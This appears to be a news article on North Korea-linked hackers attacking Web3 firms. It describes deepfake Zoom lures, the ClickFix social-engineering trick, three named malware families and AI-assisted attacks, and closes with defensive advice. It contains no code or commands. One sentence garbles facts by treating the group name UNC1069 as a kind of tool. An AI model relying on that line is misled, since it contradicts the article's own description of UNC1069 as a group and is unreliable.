North Korean Hackers Intensify Attacks on the Web3 Sector: New Threats and Defense Methods

Evolution of Cyber Threats: Web3 Under Fire

The cryptocurrency sector and the fintech industry are facing a new wave of high-tech attacks. According to the latest report from Mandiant, hacking groups allegedly linked to the DPRK have significantly upgraded their arsenal. The primary focus has shifted from direct protocol breaches to complex social engineering and the use of innovative malware.

To covertly collect data, attackers have begun using UNC1069 level solutions, which allow them to remain undetected within corporate networks for years.

Deepfakes and Zoom Traps: How the New Schemes Work

Modern hackers have abandoned simple phishing emails in favor of personalized contacts. The attack scheme looks as follows:

Social Media Contact: Using compromised accounts of real people, criminals reach out to employees of Web3 companies.
Video Conference: The victim is invited to a Zoom meeting where deepfakes — realistic digital masks mimicking the appearance of trusted individuals — are used.
Technical Manipulation: Under the pretext of "audio issues," hackers convince the victim to follow specific instructions. This method is known as ClickFix.

During these manipulations, the user unknowingly enters commands that activate hidden malicious scripts in their system.

Technical Arsenal: SILENCELIFT, DEEPBREATH, and CHROMEPUSH

Cybersecurity specialists have identified three new types of malware actively used in recent attacks.

Malware Characteristics

SILENCELIFT, DEEPBREATH, and CHROMEPUSH are next-generation tools designed to:

Extract deep system information;
Steal credentials and access keys;
Bypass the defense mechanisms of modern operating systems.

The distinct feature of these programs is their "invisibility." They can function within an IT infrastructure without obvious signs of presence, collecting data in real-time.

The Role of Artificial Intelligence in Attacks

The UNC1069 group, known since 2018, made a qualitative leap at the end of 2025. Researchers note that hackers have begun actively using Artificial Intelligence tools to automate their attacks. This has not only increased the efficiency of "processing" victims but also significantly complicated the process of detecting malicious code by traditional antivirus means.

Who is at Risk and How to Stay Protected?

The high-risk zone includes:
Crypto companies and exchanges;
Software developers in the Web3 space;
Venture capital funds and investment organizations.

Safety Recommendations

To minimize risks, experts strongly recommend strengthening communication controls. Benefit for business lies in switching to multi-factor authentication and implementing identity verification protocols for any technical requests during video calls. Remember: no legitimate service will ever require you to enter system commands to "fix audio" in Zoom.